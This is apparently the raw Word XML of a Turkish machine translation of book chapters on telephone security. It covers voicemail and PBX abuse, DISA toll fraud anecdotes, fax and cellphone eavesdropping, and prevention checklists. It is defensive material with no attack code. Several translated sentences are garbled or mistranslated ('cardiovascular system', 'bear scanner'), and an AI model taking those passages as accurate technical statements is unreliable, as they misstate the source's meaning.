        <w:t>Çevirme Tehlikelerine Karşı Koruma: Ses Sistemleri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>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SES POSTA GÜVENLİĞİ SINIRLARI ÖRNEKLER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kıllı bir bilgisayar korsanı, bir şirketin sesli postasındaki otomatik sesi, şirketin kullandığı sistemin türünden dinlemesini anlatabilir. Bu felaket olabilir, çünkü bilgisayar korsanları genellikle fabrika varsayılanını da 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odlar sisteme girer ve bu sayede işletim sistemine geçmelerini sağ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sistemi. Bu, uluslararası arama yapabilmeleri anlamına gelebilir. O</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şağıdaki örnekte belirtildiği gibi, diğer bazı ilginç durumlar için de geçerlid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seminerde tanıştığım bir kullanıcı, sesli posta sisteminin için kullanıldığını söyled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kaç kız çocuğu ameliyatı yapmak için birkaç ay. Hackerlar başard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özel sesli posta kutularını açıp kurma (yetkili kullanıcıları kullanarak</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utular) saat sonra. Çalışanlar saat 8: 00'de gelmeden önce tüm bu mesajları silmek için her zaman dikkatli oldu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ız operasyonu ya basıldı, taşındı ya da sese olan ilgisini kaybett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posta sistemi “Müşterilere” verilen tüm iletil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vardiya pazartesi sabahı geldi! Bu mesajların içeriğ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telekom yöneticisi tarafından ayrıntılandırılmamış, ancak sabahın hala şirket içinde efsanevi olduğu tespit edilen şaşırtıcı mesajların çoğuna söylenmişti. Bu komik, özellikle de gerçek bir maliyet olmadığı içi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üroyu yükseltmek dışında bir şirket dedikodu bir ya da iki dedikod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nunla birlikte, katılan herkes için rahatsız edici olan şey, gitmiş olmasıyd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çok uzun süredir algılanmadı. Şirketiniz bu kodları sık sık değiştiriyor mu? Başarısız girişimleri izler mi? Eğer bilseyd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u anda saldırıya uğradılar m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kinci bir şirket o kadar şanslı değildi. Bu şirketin, sesli postadan dış hatlara yapılan tüm operatör transferlerini engelleme konusunda resmi bir politikası vard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911'e kadar. Operatörler yeni prosedür üzerine eğitildi ve imzalarını verdil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2 CRC Press LLC</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4, CRC Press LLC tarafında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dure. Operatörler kapalıyken Şükran Günü hafta sonu ve</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Telefonlar güvenlik görevlisine devredildi (eğitilmemiş), arkadaş canlısı bir arayan kendini “AT&amp;T’deki Bill” olarak tanımladı ve test etmek için dış transfer isted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telefonlar. “Bill” Şükran Günü'nü ve önümüzdeki üç gününü geçird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i hacklemek. Her defasında gardiyan “Assissted AT&amp;T” günlüğüne bir giriş yaptı. Pazartesi sabahı bir güvenlik amiri düzinelerce gördüm</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rişleri şüphelendi ve telekom yöneticisi olarak nitelendirdi. Sonuç? bir</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Pakistan'a beş haneli telefon faturası! Bunun şu an organizasyonunuzda olup olmadığını biliyor musunuz? Herkes eğitildi mi?</w:t>
      </w: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SES POSTA İÇİN ÖNLEYİCİ ÖNLEML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kullanıcı bu sistemlerdeki kötüye kullanıma karşı korunmak için ne yapabilir? Aşağıdaki aktiviteler önleme kontrol listesi sağ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1. Her durumda dış hatlara transfer yapılmasını yasaklayan politika uygulamak,</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911 acil durum transferi olası istisnası hariç.</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2. DISA bağlantısını kesin (doğrudan içeriye sistem erişimi). Hackerlar buna atıfta bulunu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Çevirmeli / Uzak Çalın. Göçebe ya da evden çalışan işçiler tarafından kullanıl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uzak bir konumdan PBX çevir sesine erişme. Arayan kişi ar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eri çevir sesi duyulur, bir erişim kodu girilir, ardından telefondaki aramayı tamam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 anahtarı. Bu sistemler kelimenin tam anlamıyla dünyaya haykırıyor, “Lütfe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eni hack! ”Bu sistem gerekliyse, uzun, karmaşık erişim kullanı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odları girin ve sistemin bir arama değil sessizlikle cevap vermesini sağlayı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rayana kodu girene kad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3. Şüpheli faaliyetler için sistemleri izleyin. 300 başarısız girişimde bulunurs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dün gece DISA veya dial-in modem portlarında yapıld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 bunu biliyor m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4. Çoklayıcılara, yönlendiricilere ve PBX’e giriş bağlantı noktaları izleniyor m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üpheli aktivite? Orijinal fabrika kodları değiştirildi mi? dışınd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satıcılar, şu anda kim arıyor ola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5. Dumpster dalgıçlarını izleyin. Birçok insan şirketten geç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lastRenderedPageBreak/>
        <w:t>kredi kartı makbuzları ve uzun mesafe giriş kodları arayan çöp!</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6. Gümrüklü bakım işçilerini kiralayın. Temizlik biliyor musu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Crews? Kullanıcılara hassas erişim kodlarını açık bırakmamaları talimatı veriliyor m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mürettebatın onları bulabileceği masalar? Bir müşterim aslında b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üst düzey faks makinesi, 17. kattaki bir ofisten çalındı! Bulurd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kaç gün sonra yakındaki bir rehin dükkanınd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7. Şirketin telekomünikasyon gizlilik politikası var mı? B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E-posta, sesli posta ve diğer ortamları kapsayacak şekilde uygulanmalı ve yeterince geniş olmalıd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Örneği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BC Şirketi, iletişimin mutlak gizliliğine kendini adamışt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ve her çalışanın iletişim iznine sahip olmama hakkı vard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2 CRC Press LLC</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4, CRC Press LLC tarafında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tored. Bununla birlikte, normal bakım faaliyeti sırasında istemeden yasadışı faaliyeti keşfedersek, bunu bildirme hakkımızı saklı tutarız.</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sorumlu makamlara faaliyet. ”</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durumun izlenmesi gerekliyse, bu durum bir miktar iyileşme sağlayacakt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imalat şirketinin çalışanları üç T1’yi bulmak için bir tatilden sonra pazartesi sabahı geldiler (bilgisayar korsanları uzun hafta sonları sev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BD Sprint’ine girmeye değer, hepsi İspanyolca konuşan insanlarla dol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Uzaktaki bir ülkeye yabancı bir dil konuşan 72 kanal insa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in nikeli. Şirketin İspanyolca konuşan herhangi bir yokt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müşteriler, çalışanlar veya denizaşırı şubeler. Üzerindeki insanların çoğ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ramalar muhtemelen yasadışı olduğunu bilmiyordu. Aldatmaca sanatçılar sürekli çalışmak</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öçmen toplulukları ve ankesörlü telefonlardaki yeni göçmen hatlar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tibarsız hırsızlardan “indirim çağrıları” bekleniyor ortak bir manzara</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birçok şehirde.</w:t>
      </w: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TESİS GÜVENLİĞ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Peki ya faks makinesi gibi diğer dahili güvenlik ödünleri? Çünkü bilgi güvenliği iş dünyasında çok önemlidir ve</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lgilerin yetkisiz erişimi daha yaygın hale geliyor, faks iletimleri ihmal edilmemelidir. Faks makinesi yaygın olarak kabul görmekte ve yoğun şekilde kullanılmaktadır, ancak bu cihazlar için güvenlik önlemleri sıklıkl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çermiyo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güvenliği yalnızca faks makinelerini değil aynı zamanda iş istasyonlarındaki faks kartlarını da ilgilendirir. Bir şirket ne kadar özel bilgi bilmel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uruluşunuzu bu 79 $ 'lık faks panosundan hemen terk ediyor ola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nun LAN (yerel alan ağı) standartları üzerinde doğrudan bir etkisi vard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her şirketin sahip olması gerekir. Aldığı takdirde şirketin sorumluluğu ned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çalışan veya çalışanlar fakstan öğrenilen bilgileri kişisel kazanç için kullanıyorsa, başka bir şirkete yönelik veya hatta daha fazla kasıtlı olarak mı? Önemli ola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nunla birlikte, daha da rahatsız edici olan şey, kasıtlı olarak bir şirketten özel bilgi almaya çalışan insanlar. Örneği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makinesinin yanındaki çöp kovası rutin olarak parçalanmış veya bun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materyaller basitçe atılır mı? Makine görünür bir alanda mı? bu m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zli yazışmaların uzun süre açık görünümde olmasını önlemek için gelen mesajlar için sık sık kontrol edildi mi? M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makinesi herhangi bir zamanda gerçekten özel veriler için kullanılıyor mu? Eğer öyleyse, ek</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önlemler gerekli. Sıklıkla, faks durdurmanın (veya herhangi bir gizli bilginin herhangi bir türünün) başlıca nedeni dahilid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aynaklar. Şirketler, meraklı veya hoşnutsuz çalışanların tehdidini genellikle görmezden gelir. Bu çalışanlar faks trafiğini okuyabilir. Yetkisiz erişimin bordro, güç azaltma veya finansal durumlara olumsuz etkisi</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güvenli olmayan faks makineleri aracılığıyla edinilen bilgiler açıktı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FAKS GÜVENLİĞİ ÖNLEYİCİ ÖNLEMLERİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00041DA9"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lastRenderedPageBreak/>
        <w:t>Faks makinelerine istenmeyen erişimi önlemek için bir şirket birkaç proaktif adım atabilir. İsme özgü marka ve modeller yerine</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hızlı bir şekilde eskimeyen) ekipman, faks makinesinin güvenliği için istenen özellikler, çalışma ortamı</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makine veya her ikisi de aşağıdaki bölümlerde açıklanmıştır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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Üstün Bir Faks Makinesi Kullanı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 makineler faks iletimlerini belleğe alır ve sak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zli posta kutusundaki bir sabit sürücüde. Adresleme şemas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ı, telefona depolamak için gönderen tarafından genişletilmiş aramanın kullanılmasını gerektir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zli posta kutusu. Uygun güvenlik koduna sahip bir kullanıc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makinesini telefondan almak için bu kodu makineye girin.</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sürücü. Faks sonra yazdırılır ve dosya aynı anda silinir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00041DA9" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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Düşük Uçlu Masaüstü Makine Kullanı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Sürekli olarak gizli veya hassas bilgiler gönderen veya alan kullanıcılar için, düşük kaliteli bir masa üstü makinenin kullanılması tavsiye edilebilir. Bu ola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htiyaç duyulan alanda kontrol edilebilir. İhtiyaç duyulan bir makine olarak, b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zli bilgileri göndermek için belirli bir bölüm tarafından kullanılabilir. Rutin idari trafik için normal merkezileştirilmiş faks makinesi kullanılabilir. Bu, trafiği ayırır ve ilave bir kullanım sağ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üvenlik seviyesi Ayrıca bu masaüstünün maliyeti de ucuz</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Makineler, gerekli özelliklere ve telefon hattı maliyetlerine bağlı olarak genellikle 400 doların altındadır.</w:t>
      </w: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Yerel Ağlarda Depolama ve İletme Faks ve Faks Sunucular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rada bir bilgisayar bellekten gönderir ve belleğe geçe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mesaj göndermek ve almak için gizli uzun süreli prosedürlerin kullanılmas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yüksek kaliteli faks makinelerine benzer. Yerel alan ağları şimdi ağlarda faks sunucusu kullanıyor. Bunlar aslında kullanıcılardan faks alan ve aktarım gerçekleşene kadar saklayan bilgisayarlard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Orijinal belgeler, bir seviye ekleyen sisteme taranmalıd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karmaşıklık Ayrıca, gelen trafik yönlendirilebilmel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Üstün tek başına faks makinelerine benzer, gizli bir posta kutusuna.</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Bu uygulanmazsa, bir sistem yöneticisinin faksı okumak zorunda kalacağı ve ardından onu ağ üzerinde veya kağıt biçiminde istenen kişiye yönlendirmesi gerektiği için güvenlik ihlal edilir.</w:t>
      </w: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Sesli Posta Sistemiyle Ön Uç</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Yeni tarif edilen bazı programlara benzer şekilde, bir sesli posta sistem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lgi saklama için şifre ve şifre koruması sağlayacak şekilde</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2 CRC Press LLC</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 2004, CRC Press LLC tarafında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gönderme Sistem bir mesajla cevap vermek için programlanmış</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örneğin: “İki mesajınız ve bir faksınız var.” Kullanıcı daha sonra sesli mesajları herhangi bir telefondan alır ancak aramak zorunda kalı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ı almak için bir faks makinesinden Bir faksa geçmenin alternatif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Cihaz bir kod girip, telesekreter sisteminin b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ortak faks makinesi; Ancak, bu daha riskli olarak kabul edilir. Bir çalışan kodunu girip hemen başka bir gelen posta alab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arayın ya da dikkatini başka bir yere vermeyin. Bu arad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faks korumasız bir katılımsız makineye giriyor. Yerleşik koruma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Çalışanları makinede olmaya zorlayan prosedürler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 nedenle faks tercih edil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Çünkü hemen hemen her türlü müdahale ve izleme mümkün</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Telefon hattında, özellikle hassas faks makinelerine hizmet veren hat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 şifreleme cihazının kullanılmasıyla güvenli hale getirildi. Bu cihaz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pahalı olabilir, gönderilmeden önce verileri karıştırın. Biraz iş</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hem faks makineleri hem de konuşmalar için. Bu, her ikisinin de bittiği anlamına gelir</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Bilginin şifrelenmesi / şifresinin çözülmesi için karşılaştırılabilir donanıma sahip olması. Aksi takdirde, faks trafiği güvenli olmayan bir modda gönderilmelidi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Kullanıcıları Eğitmek</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00041DA9" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>Dizüstü bilgisayarların veya faks kartlarının kişisel bilgisayarlarda olduğu kullanıcıla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iletim ve alım ile ilgili riskler hakkında eğitilmiş</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u sistemlerdeki faksların sayısı. Uygun denetim ve güvenlik kontroller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Gizli dosyaların ve bilgilerin fakslanmasını önlemeye yardımcı olur</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in bir PC'den kağıda kaydedilmeden doğrudan.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00041DA9" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00041DA9" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00041DA9">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Otel Faksları</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En iyi yaklaşım, gizli bilgilerin gönderilmemesi veya</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otel faks makinesi aracılığıyla. Otel görevlileri genellikle faksın kopyasını alır</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Trafik durumu ile ilgili bir soruşturma olması durumunda. Ayrıca otel personelinin yanlış tarafa faks göndermesi de nadirdir.</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041DA9">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>HÜCRESEL TELEFON GÜVENLİĞİ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00041DA9" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pP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Yol savaşçısının sıkça suistimal ettiği bir başka silahlanma hücreseldir.</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telefon. Çok milyarlık bir üretim şirketi finansman ayarlıyord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şirket için. CEO her gün cep telefonunda işlemin en ayrıntılı ayrıntılarını tartışacak. Sadece anlaşma yaklaştığı gibi</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Birisi onun konuşmalarını izleyip izleyemeyeceğini sordu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00041DA9" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00041DA9">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Neyse ki, işler sorunsuz gitti. Bununla birlikte, CEO için şok oldu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00041DA9">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>200 $ 'lık ayı tarayıcısına sahip olan herkesin tüm sohbeti kolaylıkla izleyebileceğini öğrenin.</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8855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Cep Telefonlarına Yönelik Önlemler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008855BB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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1. Hiçbir zaman cep telefonu üzerinden kredi kartı veya telefon kredi kartı numarası vermeyi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2. Asla herhangi bir kablosuz telefon üzerinden söylemeyeceğiniz bir şey söylemeyi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üm dünyayı bilmeyi umursam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3. Mümkün olduğunca yoldayken, 800 numarayı aramayı deneyi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kredi kartıyla arama yapmaktan daha çok. Zeki bir bilgisayar korsanı yakalay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otomatik bir kredi kartı araması yaptığınızda, hatt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Numara bir operatöre okunmuyors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4. Hücresel faturanızı yakından izleyin ve olağandışı arama aktivitelerini (numaranızın klonlandığını gösteren) hücrenize bildiri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emen sağlayıcı.</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8855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Tavsiye Edilen Telefon Dolandırıcılığı Önlemleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008855BB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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Kuruluşlar bu türden önlemeleri önlemek için çeşitli önlemler almalı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Bunlar şunları içer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Mümkünse, DISA hatlarını ayırma. Bu garantili tek çözümdür. Bağlantı kesilmesi mümkün değilse, kalan önerileri dikkate alı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Daha uzun erişim kodları kullanmak. Üç basamaklı bir erişim kodu kullanmayın; bunun yerine 7, 8 veya 9 basamaklı bir kod kullanın. Oran katlanarak artmakta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koda eklediğiniz her numara. Sisteminiz çok zors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çatlak, hacker daha kolay bir işarete geçmesi muhtemeld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Sessizce cevap vermek için bir DISA opsiyonu. En çok duyan çevir ses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Yanıtlama bir ölü vermek ve açık olmak olduğunda ortaya çıkan DISA hatlar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lgisayar korsanlarına ve meraklılara davet. Hattı sessizce yanıtlayarak, bilgisayar korsanı tarafından kullanılan otomatik ekipman hattı görecek</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sesli arama olarak ve onu kullanışlı olarak işaretlemeyecekt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Trafiği izlemek. Yaklaşan felaketin çeşitli uyarı işaretleri şunlar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1. 1-800 satırında artan trafik hacm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2. Giden gövdelerde artan trafik hacm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3. 950'ye daha fazla erişim</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u trafiği izleyerek, sahtekarlığı çok geç olmadan tespit etmek mümkün olabilir. Benzer şekilde, taşıyıcılar bu arayışta yardımcı olabilir. Çoğu şimd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olağandışı durumlar veya trafik yüklerinin trafik takibi ve raporlanmasını sağlayan aylık ücret karşılığında dolandırıcılık sigortası sunmak.</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8855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>SONUÇ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008855BB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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şirketin hangi finansal para cezasını ödeyebileceğ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ikkat eksikliği sadece bir makalede ele alınamayacak kadar çoktur. O</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unu sağlamak için en sıradan sistemlere bile dikkat etmeyi öd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Ofisin bu küçük kolaylıkları üzerinde büyük bir baskı haline gelmez</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aşka önemli bir sistem - kardiyovasküler sistem. Madde 5-04-42</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madalyonun diğer tarafını, yani veri taşıyıcıyı güvence altına alacak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>yetkisiz davetsiz misafirlerden.</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jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855BB">
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Voice Security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(Ses Güvenliği)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008855BB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Chris Hare, CISSP, CIS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Günümüz işletmelerindeki çoğu güvenlik uzmanı, zamanlarının çoğunu şirkete güvenli bir şekilde erişebilmek için çalış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elektronik bilgi Ancak, ses ve telekomünikasyon dolandırıcılığı hala kurumsal iş dünyasında her yıl milyonlarca dolar tutuyor. Telekomünikasyon arenasında kayıpların çoğu paralı dolandırıcılıktan kaynaklanmakta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çok farklı yöntemle uygulanmakta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Milyonlarca insan günlük olarak ses ve veri ihtiyaçları için telekomünikasyon altyapısına güveniyo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meli. Bu bağımlılık telekomünikasyon sisteminin kritik bir altyapı olarak sınıflandırılmasına neden oldu</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leşen. Telefon olmadan, günlük faaliyetlerimizin çoğu, neredeyse olmasa da, daha zor olacakt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imkansız.</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çok güvenlik uzmanı ses güvenliğini düşündüğünde, otomatik olarak şifreli telefonları düşünü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faks makineleri ve benzerleri. Ancak, ses güvenliği çok daha basit olabilir ve doğrudan cihazdan başlay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unuz bağlı. Bu bölüm telefon sisteminin nasıl çalıştığını, ücretli dolandırıcılık, sesli iletişim güvenliği kaygılarını ve telekomünikasyonlarını korumak için herhangi bir kuruluş için uygulanabilir teknikleri ele alıyo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ltyapısı. Yaygın olarak kullanılan telefon terimlerinin açıklamaları bölüm boyunca bulunu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POTS: Eski Düz Telefon Servis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Çoğu insan “telefon” olarak adlandırır. Alıcıyı alır, çevir sesini duyar ve aramalarını yapar. Onla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ilelerini aramak, iş yapmak, mal satın almak ve yardım ya da acil yardım almak için kullanın. Ve onla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er zaman çalışmasını beklerim.</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Günlük olarak evlerimizde kullandığımız telefon hizmeti, telefon endüstrisinde POTS olarak bilin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veya eski telefon servisi. POTS aboneye çeşitli bileşenlerle ulaştırılmaktadır (bkz.</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Sergi 51.1):</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Telefon ahizes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Kablolam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Bir hat kart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 Bir anahtarlama cihaz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 ahizesi veya istasyonu, halkın en aşina olduğu bileşendir. Ne zama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müşteri ahizeyi alır, devre kapatılır ve anahtara kurulur. Hat kart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un kapalı olduğu ve telefondan kapalı olduğu bir çevir sesi duyulu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htar, abonenin darbeli telefon kullanıp kullanmadığını ya da abone tarafından aranan rakamları topla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okunmatik Tone®. Bir darbeli telefon telefon hattındaki voltajı değiştirir, anahtardaki bir röleyi açar ve kapat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u, hatta duyulan tıklamaların veya darbelerin nedenidir. Dokunmatik Tonlu arama ile</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htarı aramayı yapmak için zil sesleri oluşturu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htardaki işlemci rakamları kabul eder ve aramayı alıcıya yönlendirmenin en iyi yolunu belirl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bone. Alıcı telefon seti aynı anahtara veya diğer yarıya bağlı ol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ünyada Ne olursa olsun, çok karmaşık bir şebeke nedeniyle aramanın yönlendirilmesi kalp atışıyla gerçekleşiyor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>anahtarları, sinyal ve yönlendirme.</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8855BB">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>
          <w:color w:val="212121"/>
        </w:rPr>
        <w:t>Bir Arada Bağlamak</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008855BB" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:b/>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lastRenderedPageBreak/>
        <w:t>Teknolojinin çoğu alanındaki sorun terminoloji ile ilgilidir. Telefon endüstrisi farklı değil. mayo</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ve her ikisi de aynı şeyi ifade eder - sinyali aboneye iletmek için kullanılan devre ve kablolama.</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ralarındaki temel fark, kullanıldığı y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em sandıklar hem de çizgiler dijital veya analog olabilir. Hat, öncelikle kablolama ile ilgil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 aboneye geçer (bkz. Ek 51.2). Bu konut veya iş abonesi ol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oğrudan telefon şirketinin anahtarına veya bir PBX’e Temel olarak, çizgi genellikle ilişkilid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k bir abonenin iletişimini anahtara taşıyarak.</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Öte yandan, ana hat, genellikle PBX’ten telefon operatörünün anahtarına bağlant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veya bir anahtardan diğerine. Bir ana hat, hat ile aynı işlevi görür. Tek fark</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ikisinin taşıyabileceği arama veya trafik miktarı. Ana hat, anahtarları birbirine bağlamak için kullanıldığından, ana hat</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attan çok daha fazla trafik ve arama taşıyabilir. Devre terimi genellikle bağlantıyı tanımlamak için kullanıl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cihazdan diğerine, bağlantı türüne, analog veya dijital veya</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="212121"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855BB">
        <w:rPr>
